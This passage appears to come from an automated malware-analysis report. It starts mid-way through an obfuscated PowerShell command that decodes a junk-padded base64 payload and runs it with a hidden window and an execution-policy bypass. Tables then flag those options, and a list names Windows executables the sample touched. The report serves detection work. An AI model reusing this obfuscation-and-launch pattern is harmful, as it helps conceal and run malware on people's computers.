HMAuOvhPbYLZQBtAuOvhPbYLGIAuOvhPbYLbAuOvhPbYLB5AuOvhPbYLC4AuOvhPbYLRwBlAuOvhPbYLHQAuOvhPbYLVAuOvhPbYLB5AuOvhPbYLHAuOvhPbYLAuOvhPbYLZQAuOvhPbYLoAuOvhPbYLCcAuOvhPbYLRgBpAuOvhPbYLGIAuOvhPbYLZQByAuOvhPbYLC4AuOvhPbYLSAuOvhPbYLBvAuOvhPbYLG0AuOvhPbYLZQAuOvhPbYLnAuOvhPbYLCkAuOvhPbYLOwAuOvhPbYLkAuOvhPbYLG0AuOvhPbYLZQB0AuOvhPbYLGgAuOvhPbYLbwBkAuOvhPbYLCAuOvhPbYLAuOvhPbYLPQAuOvhPbYLgAuOvhPbYLCQAuOvhPbYLdAuOvhPbYLB5AuOvhPbYLHAuOvhPbYLAuOvhPbYLZQAuOvhPbYLuAuOvhPbYLEcAuOvhPbYLZQB0AuOvhPbYLE0AuOvhPbYLZQB0AuOvhPbYLGgAuOvhPbYLbwBkAuOvhPbYLCgAuOvhPbYLJwBWAuOvhPbYLEEAuOvhPbYLSQAuOvhPbYLnAuOvhPbYLCkAuOvhPbYLLgBJAuOvhPbYLG4AuOvhPbYLdgBvAuOvhPbYLGsAuOvhPbYLZQAuOvhPbYLoAuOvhPbYLCQAuOvhPbYLbgB1AuOvhPbYLGwAuOvhPbYLbAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLWwBvAuOvhPbYLGIAuOvhPbYLagBlAuOvhPbYLGMAuOvhPbYLdAuOvhPbYLBbAuOvhPbYLF0AuOvhPbYLXQAuOvhPbYLgAuOvhPbYLCgAuOvhPbYLJwBkAuOvhPbYLEgAuOvhPbYLaAuOvhPbYLAuOvhPbYLwAuOvhPbYLEwAuOvhPbYLbQBkAuOvhPbYLHUAuOvhPbYLYQBXAuOvhPbYLDUAuOvhPbYLcAuOvhPbYLBiAuOvhPbYLG0AuOvhPbYLbAuOvhPbYLBuAuOvhPbYLFoAuOvhPbYLVwBKAuOvhPbYLDMAuOvhPbYLWgBXAuOvhPbYLDQAuOvhPbYLdgBOAuOvhPbYLGoAuOvhPbYLTQB5AuOvhPbYLEwAuOvhPbYLagBNAuOvhPbYLDEAuOvhPbYLTQBpAuOvhPbYLDQAuOvhPbYLMgBOAuOvhPbYLFQAuOvhPbYLRQB1AuOvhPbYLE4AuOvhPbYLRAuOvhPbYLBrAuOvhPbYLHYAuOvhPbYLTAuOvhPbYLB6AuOvhPbYLHAuOvhPbYLAuOvhPbYLdwBkAuOvhPbYLEgAuOvhPbYLUgBvAuOvhPbYLCcAuOvhPbYLIAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBkAuOvhPbYLGYAuOvhPbYLZAuOvhPbYLBmAuOvhPbYLGQAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLZgBkAuOvhPbYLGYAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLZgBkAuOvhPbYLGYAuOvhPbYLJwAuOvhPbYLgAuOvhPbYLCwAuOvhPbYLIAuOvhPbYLAuOvhPbYLnAuOvhPbYLGQAuOvhPbYLYQBkAuOvhPbYLHMAuOvhPbYLYQAuOvhPbYLnAuOvhPbYLCAuOvhPbYLAuOvhPbYLLAuOvhPbYLAuOvhPbYLgAuOvhPbYLCcAuOvhPbYLZAuOvhPbYLBlAuOvhPbYLCcAuOvhPbYLIAuOvhPbYLAuOvhPbYLsAuOvhPbYLCAuOvhPbYLAuOvhPbYLJwBjAuOvhPbYLHUAuOvhPbYLJwAuOvhPbYLpAuOvhPbYLCkAuOvhPbYL';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('AuOvhPbYL','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window | ||||||
option | -executionpolicy bypass | value | Attempts to bypass execution policy | ||||||
option | -noprofile | value | Does not load current user profile | ||||||
option | -windowstyle hidden | value | Attempts to execute command with a hidden window |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |